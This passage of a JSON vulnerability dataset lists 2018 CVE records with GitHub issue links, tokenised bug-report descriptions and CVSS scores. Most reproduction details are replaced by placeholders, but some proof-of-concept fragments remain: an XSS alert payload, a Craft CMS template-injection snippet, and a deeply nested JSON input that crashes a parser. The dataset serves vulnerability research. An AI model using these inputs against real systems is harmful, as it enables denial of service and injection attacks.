  29861. "exploitabilityScore": 2.8
  29862. },
  29863. {
  29864. "CVE_ID": "CVE-2018-20421",
  29865. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18289",
  29866. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18289",
  29867. "Repo_new": "ethereum/go-ethereum",
  29868. "Issue_Created_At": "2018-12-12T03:29:59Z",
  29869. "description": "EVM dynamic array maybe occupy large memory. System information Geth version: APITAG OS & Version: Linux Commit hash : no found Expected behaviour Dynamic array save itself length in memory and this length will restrict index of array . ERRORTAG See the assambly , APITAG implicate index of array check . ERRORTAG So call function a like this APITAG , APITAG will success execute ;but APITAG , APITAG will except. Actual behaviour We know Solc will auto insert array index check code in assambly ,so I try still rewrite the dynamic length . ERRORTAG Unfortunately ,it can't pass compile .It mean we rewrite the length of dynamic array APITAG I try to rewrite the array length on memory that is work . ERRORTAG Lastly ,I try writing a data to offset APITAG in array .EVM will occupy large memory NUMBERTAG MB) ERRORTAG Steps to reproduce the behaviour This is EVM test command (ignore gas limit ): ./evm code APITAG input APITAG gas NUMBERTAG debug run FILETAG FILETAG Backtrace Not found ,you can see large memory alloc output on console by debug flag .",
  29870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29871. "severity": "HIGH",
  29872. "baseScore": 7.5,
  29873. "impactScore": 3.6,
  29874. "exploitabilityScore": 3.9
  29875. },
  29876. {
  29877. "CVE_ID": "CVE-2018-20425",
  29878. "Issue_Url_old": "https://github.com/libming/libming/issues/163",
  29879. "Issue_Url_new": "https://github.com/libming/libming/issues/163",
  29880. "Repo_new": "libming/libming",
  29881. "Issue_Created_At": "2018-09-21T09:02:41Z",
  29882. "description": "Null pointer dereference in pushdup (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG CODETAG CODETAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
  29883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29884. "severity": "HIGH",
  29885. "baseScore": 8.8,
  29886. "impactScore": 5.9,
  29887. "exploitabilityScore": 2.8
  29888. },
  29889. {
  29890. "CVE_ID": "CVE-2018-20427",
  29891. "Issue_Url_old": "https://github.com/libming/libming/issues/164",
  29892. "Issue_Url_new": "https://github.com/libming/libming/issues/164",
  29893. "Repo_new": "libming/libming",
  29894. "Issue_Created_At": "2018-09-21T09:12:00Z",
  29895. "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG (decompile.c NUMBERTAG This is not the same issue with NUMBERTAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
  29896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29897. "severity": "HIGH",
  29898. "baseScore": 8.8,
  29899. "impactScore": 5.9,
  29900. "exploitabilityScore": 2.8
  29901. },
  29902. {
  29903. "CVE_ID": "CVE-2018-20448",
  29904. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/20",
  29905. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/20",
  29906. "Repo_new": "philippe/frogcms",
  29907. "Issue_Created_At": "2018-12-18T13:31:22Z",
  29908. "description": "The parameter under FILETAG is that the Database name has reflective XSS. The parameter under FILETAG is that the Database name has reflective XSS NUMBERTAG The Database name , username and password must be correct NUMBERTAG You can use the exp APITAG alert NUMBERTAG APITAG FILETAG NUMBERTAG Success FILETAG",
  29909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29910. "severity": "MEDIUM",
  29911. "baseScore": 5.4,
  29912. "impactScore": 2.7,
  29913. "exploitabilityScore": 2.3
  29914. },
  29915. {
  29916. "CVE_ID": "CVE-2018-20450",
  29917. "Issue_Url_old": "https://github.com/evanmiller/libxls/issues/34",
  29918. "Issue_Url_new": "https://github.com/libxls/libxls/issues/34",
  29919. "Repo_new": "libxls/libxls",
  29920. "Issue_Created_At": "2018-12-23T15:01:22Z",
  29921. "description": "Double Free vulnerability in read_MSAT function. Test Version dev version, git clone URLTAG Test Program APITAG Gdb and Backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29923. "severity": "MEDIUM",
  29924. "baseScore": 6.5,
  29925. "impactScore": 3.6,
  29926. "exploitabilityScore": 2.8
  29927. },
  29928. {
  29929. "CVE_ID": "CVE-2018-20451",
  29930. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/2",
  29931. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/2",
  29932. "Repo_new": "uvoteam/libdoc",
  29933. "Issue_Created_At": "2018-12-25T06:51:08Z",
  29934. "description": "A heap buffer overflow in APITAG process_file. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29936. "severity": "MEDIUM",
  29937. "baseScore": 6.5,
  29938. "impactScore": 3.6,
  29939. "exploitabilityScore": 2.8
  29940. },
  29941. {
  29942. "CVE_ID": "CVE-2018-20453",
  29943. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/1",
  29944. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/1",
  29945. "Repo_new": "uvoteam/libdoc",
  29946. "Issue_Created_At": "2018-12-24T15:41:59Z",
  29947. "description": "There is a heap buffer overflow on APITAG getlong. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29949. "severity": "MEDIUM",
  29950. "baseScore": 6.5,
  29951. "impactScore": 3.6,
  29952. "exploitabilityScore": 2.8
  29953. },
  29954. {
  29955. "CVE_ID": "CVE-2018-20454",
  29956. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/1",
  29957. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/1",
  29958. "Repo_new": "coolboy0816/audit",
  29959. "Issue_Created_At": "2018-12-25T02:13:26Z",
  29960. "description": "APITAG XSS. Reflective XSS exists in search box APITAG JS can be injected into the page by APITAG twice encoding. The vulnerability involved is the parameter key in get request.",
  29961. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29962. "severity": "MEDIUM",
  29963. "baseScore": 6.1,
  29964. "impactScore": 2.7,
  29965. "exploitabilityScore": 2.8
  29966. },
  29967. {
  29968. "CVE_ID": "CVE-2018-20456",
  29969. "Issue_Url_old": "https://github.com/radare/radare2/issues/12372",
  29970. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12372",
  29971. "Repo_new": "radareorg/radare2",
  29972. "Issue_Created_At": "2018-12-02T14:46:54Z",
  29973. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG where $STRING is one of the followings: APITAG",
  29974. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29975. "severity": "MEDIUM",
  29976. "baseScore": 5.5,
  29977. "impactScore": 3.6,
  29978. "exploitabilityScore": 1.8
  29979. },
  29980. {
  29981. "CVE_ID": "CVE-2018-20457",
  29982. "Issue_Url_old": "https://github.com/radare/radare2/issues/12417",
  29983. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12417",
  29984. "Repo_new": "radareorg/radare2",
  29985. "Issue_Created_At": "2018-12-05T16:07:28Z",
  29986. "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Compile radare2 with asan (tried O3/ O0) run APITAG NUMBERTAG asr' etc).",
  29987. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29988. "severity": "MEDIUM",
  29989. "baseScore": 5.5,
  29990. "impactScore": 3.6,
  29991. "exploitabilityScore": 1.8
  29992. },
  29993. {
  29994. "CVE_ID": "CVE-2018-20458",
  29995. "Issue_Url_old": "https://github.com/radare/radare2/issues/12374",
  29996. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12374",
  29997. "Repo_new": "radareorg/radare2",
  29998. "Issue_Created_At": "2018-12-02T15:37:07Z",
  29999. "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rabin NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rabin2 shows binary property or exits abnormally Actual behavior rabin2 crashes ERRORTAG Steps to reproduce the behavior run APITAG FILETAG",
  30000. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30001. "severity": "MEDIUM",
  30002. "baseScore": 5.5,
  30003. "impactScore": 3.6,
  30004. "exploitabilityScore": 1.8
  30005. },
  30006. {
  30007. "CVE_ID": "CVE-2018-20460",
  30008. "Issue_Url_old": "https://github.com/radare/radare2/issues/12376",
  30009. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12376",
  30010. "Repo_new": "radareorg/radare2",
  30011. "Issue_Created_At": "2018-12-02T16:43:25Z",
  30012. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error messages Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG Additional Logs, screenshots, source code, configuration dump, ... We also find another file generates from r2's APITAG results that also emits such an error when running APITAG .",
  30013. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30014. "severity": "MEDIUM",
  30015. "baseScore": 5.5,
  30016. "impactScore": 3.6,
  30017. "exploitabilityScore": 1.8
  30018. },
  30019. {
  30020. "CVE_ID": "CVE-2018-20461",
  30021. "Issue_Url_old": "https://github.com/radare/radare2/issues/12375",
  30022. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12375",
  30023. "Repo_new": "radareorg/radare2",
  30024. "Issue_Created_At": "2018-12-02T16:19:33Z",
  30025. "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | arm/arm NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior r2 works normally Actual behavior r2 crashes Steps to reproduce the behavior run APITAG and get into the REPL run bd run ao ERRORTAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... The root cause seems to be bd . For other arch binaries such as NUMBERTAG mips, ppc, it also works wrongly when bd is invoked firstly (below is a test against APITAG on Ubuntu NUMBERTAG FILETAG",
  30026. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30027. "severity": "MEDIUM",
  30028. "baseScore": 5.5,
  30029. "impactScore": 3.6,
  30030. "exploitabilityScore": 1.8
  30031. },
  30032. {
  30033. "CVE_ID": "CVE-2018-20465",
  30034. "Issue_Url_old": "https://github.com/phuctam/Server-Side-Template-Injection-in-CraftCMS-/issues/1",
  30035. "Issue_Url_new": "https://github.com/phuctam/server-side-template-injection-in-craftcms-/issues/1",
  30036. "Repo_new": "phuctam/server-side-template-injection-in-craftcms-",
  30037. "Issue_Created_At": "2018-12-10T09:52:43Z",
  30038. "description": "Server Side Template Injection in APITAG Version: Craft CMS NUMBERTAG Authentication: Admin right Reproduce steps: Step1: Access Category group creation function and create new category group as shown below: {% set user = APITAG set password = APITAG user }} | {{ password }} FILETAG Step2: Access menu APITAG create new Category in the new category created above FILETAG",
  30039. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  30040. "severity": "HIGH",
  30041. "baseScore": 7.2,
  30042. "impactScore": 5.9,
  30043. "exploitabilityScore": 1.2
  30044. },
  30045. {
  30046. "CVE_ID": "CVE-2018-20467",
  30047. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1408",
  30048. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1408",
  30049. "Repo_new": "imagemagick/imagemagick",
  30050. "Issue_Created_At": "2018-12-06T11:07:56Z",
  30051. "description": "convert hang until NUMBERTAG CPU NUMBERTAG mem. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I found a problem that will cause the program hang, and the CPU and memory will be exhausted. If limit memory, it will crash. Steps to Reproduce APITAG APITAG APITAG ulimit S NUMBERTAG it crash. System Configuration APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: git commit APITAG APITAG",
  30052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30053. "severity": "MEDIUM",
  30054. "baseScore": 6.5,
  30055. "impactScore": 3.6,
  30056. "exploitabilityScore": 2.8
  30057. },
  30058. {
  30059. "CVE_ID": "CVE-2018-20486",
  30060. "Issue_Url_old": "https://github.com/Ppsoft1990/Metinfo6.1.3/issues/2",
  30061. "Issue_Url_new": "https://github.com/ppsoft1990/metinfo6.1.3/issues/2",
  30062. "Repo_new": "ppsoft1990/metinfo6.1.3",
  30063. "Issue_Created_At": "2018-12-26T09:49:23Z",
  30064. "description": "Stored XSS Vulnerability exists in the all versions of Metinfo NUMBERTAG Stored XSS Vulnerability exists in the all versions of Metinfo APITAG can be executed javascript code. Metinfo NUMBERTAG allows XSS via the PATHTAG url_array parameter. Metinfo official website: FILETAG Metinfo NUMBERTAG source code download page URLTAG FILETAG View the doc: FILETAG",
  30065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30066. "severity": "MEDIUM",
  30067. "baseScore": 6.1,
  30068. "impactScore": 2.7,
  30069. "exploitabilityScore": 2.8
  30070. },
  30071. {
  30072. "CVE_ID": "CVE-2018-20502",
  30073. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/349",
  30074. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/349",
  30075. "Repo_new": "axiomatic-systems/bento4",
  30076. "Issue_Created_At": "2018-12-26T06:58:51Z",
  30077. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash6.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  30078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30079. "severity": "MEDIUM",
  30080. "baseScore": 6.5,
  30081. "impactScore": 3.6,
  30082. "exploitabilityScore": 2.8
  30083. },
  30084. {
  30085. "CVE_ID": "CVE-2018-20519",
  30086. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/2",
  30087. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/2",
  30088. "Repo_new": "coolboy0816/audit",
  30089. "Issue_Created_At": "2018-12-26T08:05:15Z",
  30090. "description": "APITAG ultra vires. First, register a user, create a resume, and then modify the job search intention, which can lead to the modification of any person and disclosure of personal information. Vulnerability proof\uff1a FILETAG",
  30091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  30092. "severity": "HIGH",
  30093. "baseScore": 8.1,
  30094. "impactScore": 5.2,
  30095. "exploitabilityScore": 2.8
  30096. },
  30097. {
  30098. "CVE_ID": "CVE-2018-20520",
  30099. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/27",
  30100. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/27",
  30101. "Repo_new": "bg5sbk/minicms",
  30102. "Issue_Created_At": "2018-12-14T14:07:55Z",
  30103. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER FILETAG In Firefox and chrome, URL will be APITAG In IE, if has Redirection\uff0cURL will not be APITAG After logging in, XSS is triggered using exp Exp: URLTAG \"> APITAG alert(\"dudu\") APITAG Result: FILETAG",
  30104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30105. "severity": "MEDIUM",
  30106. "baseScore": 6.1,
  30107. "impactScore": 2.7,
  30108. "exploitabilityScore": 2.8
  30109. },
  30110. {
  30111. "CVE_ID": "CVE-2018-20541",
  30112. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/287",
  30113. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/287",
  30114. "Repo_new": "libxsmm/libxsmm",
  30115. "Issue_Created_At": "2018-11-26T10:50:55Z",
  30116. "description": "reported buffer overflows. The following reports of asan errors in the generator were made in the Fedora tracker, but apparently against development source, not a version in Fedora, and it's not clear exactly how they're obtained. You may want to take a look anyhow. I haven't examined them other than to verify they don't match the NUMBERTAG source which is currently in Fedora. (I'll update the packaging to NUMBERTAG now I know about it; Fedora release notification is broken, unfortunately.) CVETAG CVETAG CVETAG",
  30117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30118. "severity": "HIGH",
  30119. "baseScore": 8.8,
  30120. "impactScore": 5.9,
  30121. "exploitabilityScore": 2.8
  30122. },
  30123. {
  30124. "CVE_ID": "CVE-2018-20552",
  30125. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/530",
  30126. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/530",
  30127. "Repo_new": "appneta/tcpreplay",
  30128. "Issue_Created_At": "2018-12-19T06:02:42Z",
  30129. "description": "APITAG NUMBERTAG heap buffer overflow problems APITAG && APITAG Both tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG tcpreplay (master NUMBERTAG d NUMBERTAG And APITAG returns ERRORTAG Triggered by APITAG POC1 poc file: URLTAG ASAN info: ERRORTAG POC2 poc file: URLTAG ASAN info: ERRORTAG",
  30130. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30131. "severity": "HIGH",
  30132. "baseScore": 7.8,
  30133. "impactScore": 5.9,
  30134. "exploitabilityScore": 1.8
  30135. },
  30136. {
  30137. "CVE_ID": "CVE-2018-20571",
  30138. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/1",
  30139. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/1",
  30140. "Repo_new": "autismjh/damicms",
  30141. "Issue_Created_At": "2018-12-28T08:37:38Z",
  30142. "description": "Arbitrary file read vulnerability . Read the global configuration file content by constructing a URL. FILETAG FILETAG",
  30143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  30144. "severity": "HIGH",
  30145. "baseScore": 7.5,
  30146. "impactScore": 3.6,
  30147. "exploitabilityScore": 3.9
  30148. },
  30149. {
  30150. "CVE_ID": "CVE-2018-20572",
  30151. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/166",
  30152. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/166",
  30153. "Repo_new": "wuzhicms/wuzhicms",
  30154. "Issue_Created_At": "2018-12-28T09:01:05Z",
  30155. "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. Vulnerability file: PATHTAG public\u00a0function\u00a0 APITAG \u00a0{\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$siteid\u00a0=\u00a0get_cookie('siteid');\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$page\u00a0=\u00a0isset($GLOBALS FILETAG APITAG NUMBERTAG",
  30156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30157. "severity": "CRITICAL",
  30158. "baseScore": 9.8,
  30159. "impactScore": 5.9,
  30160. "exploitabilityScore": 3.9
  30161. },
  30162. {
  30163. "CVE_ID": "CVE-2018-20573",
  30164. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/655",
  30165. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/655",
  30166. "Repo_new": "jbeder/yaml-cpp",
  30167. "Issue_Created_At": "2018-12-28T08:13:29Z",
  30168. "description": "Stack Overflow in APITAG . Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  30169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30170. "severity": "MEDIUM",
  30171. "baseScore": 6.5,
  30172. "impactScore": 3.6,
  30173. "exploitabilityScore": 2.8
  30174. },
  30175. {
  30176. "CVE_ID": "CVE-2018-20574",
  30177. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/654",
  30178. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/654",
  30179. "Repo_new": "jbeder/yaml-cpp",
  30180. "Issue_Created_At": "2018-12-28T07:51:02Z",
  30181. "description": "Stack Overflow in APITAG Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  30182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30183. "severity": "MEDIUM",
  30184. "baseScore": 6.5,
  30185. "impactScore": 3.6,
  30186. "exploitabilityScore": 2.8
  30187. },
  30188. {
  30189. "CVE_ID": "CVE-2018-20579",
  30190. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/601",
  30191. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/601",
  30192. "Repo_new": "contiki-ng/contiki-ng",
  30193. "Issue_Created_At": "2018-07-11T12:51:10Z",
  30194. "description": "Stack based buffer overflow while parsing JSON file. Function APITAG that implements stack push operation does not check whether new elements are still within allocated buffer. It returns error only before ending the function, but this value is never checked in JSON parser, so the next push operations are not blocked. PATHTAG define JSONPARSE_MAX_DEPTH NUMBERTAG Declaration of the buffer: PATHTAG struct jsonparse_state { ... char stack[JSONPARSE_MAX_DEPTH]; }; Function APITAG PATHTAG static int push(struct jsonparse_state state, char c) { state >stack[state >depth] = c; state >depth++; state >vtype NUMBERTAG return state >depth APITAG json[state >pos]; s = jsonparse_get_type(state); v = state >vtype; state >pos++; switch(c) { case '{': if((s NUMBERTAG s == '[' || s == ':') { push(state, c); Vulnerability is not likely to be used for Remote Code Execution exploit, because it allows to only put two types of characters to this stack: left curly bracket ({), left square bracket ([), so the risk was reduced APITAG None, Integrity: Low, Scope: Unchanged). However it is quite easy to overwrite the function return address on stack or stack canary, which leads to crash of the application (via segmentation fault) and can be used by attacker for Denial of Service attacks. Additionally, the risk of this issue is also reduced APITAG APITAG because attacker would need to parse malicious JSON, however it is quite possible when using JSON input data in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG Medium) Following JSON will trigger crash: {\"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { or using square brackets: {\"a\": APITAG Mitigation : Function APITAG should not allow to add new elements to the stack after reaching the limit (JSONPARSE_MAX_DEPTH). Functions using the APITAG function should check the returned value. \nCrash details using Address Sanitizer NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG at pc NUMBERTAG ERRORTAG NUMBERTAG f1 bp NUMBERTAG ffd NUMBERTAG c1c5a0 sp NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG thread T NUMBERTAG ERRORTAG NUMBERTAG f0 in push PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f0 in jsonparse_next PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG af in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG state' APITAG NUMBERTAG b8c0: f1 f1 f1 f NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG b8d NUMBERTAG b8e NUMBERTAG b8f NUMBERTAG b NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  30195. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  30196. "severity": "HIGH",
  30197. "baseScore": 7.1,
  30198. "impactScore": 5.2,
  30199. "exploitabilityScore": 1.8
  30200. },
  30201. {
  30202. "CVE_ID": "CVE-2018-20583",
  30203. "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/337",
  30204. "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/337",
  30205. "Repo_new": "thephpleague/commonmark",
  30206. "Issue_Created_At": "2018-12-30T01:47:42Z",
  30207. "description": "XSS Vulnerability NUMBERTAG An XSS vulnerability has been reported in this library. We're opening this issue so we have a place to provide further details once the fix is available. No action is required at this time.",
  30208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30209. "severity": "MEDIUM",
  30210. "baseScore": 6.1,
  30211. "impactScore": 2.7,
  30212. "exploitabilityScore": 2.8
  30213. },
  30214. {
  30215. "CVE_ID": "CVE-2018-20584",
  30216. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/192",
  30217. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/192",
  30218. "Repo_new": "jasper-software/jasper",
  30219. "Issue_Created_At": "2018-12-29T05:40:28Z",
  30220. "description": "hang in jasper. when jasper converted to output format jp2, it hung. ./jasper input APITAG output /dev/null output format jp2 FILETAG",
  30221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30222. "severity": "MEDIUM",
  30223. "baseScore": 6.5,
  30224. "impactScore": 3.6,
  30225. "exploitabilityScore": 2.8
  30226. },
  30227. {
  30228. "CVE_ID": "CVE-2018-20588",
  30229. "Issue_Url_old": "https://github.com/caryll/otfcc/issues/59",
  30230. "Issue_Url_new": "https://github.com/caryll/otfcc/issues/59",
  30231. "Repo_new": "caryll/otfcc",
  30232. "Issue_Created_At": "2018-12-30T08:37:39Z",
  30233. "description": "global buffer overflow in PATHTAG Test Version dev version, git clone FILETAG Test Program PATHTAG [infile] Asan Debug Information ERRORTAG POC file APITAG",
  30234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30235. "severity": "MEDIUM",
  30236. "baseScore": 6.5,
  30237. "impactScore": 3.6,
  30238. "exploitabilityScore": 2.8
  30239. },
  30240. {
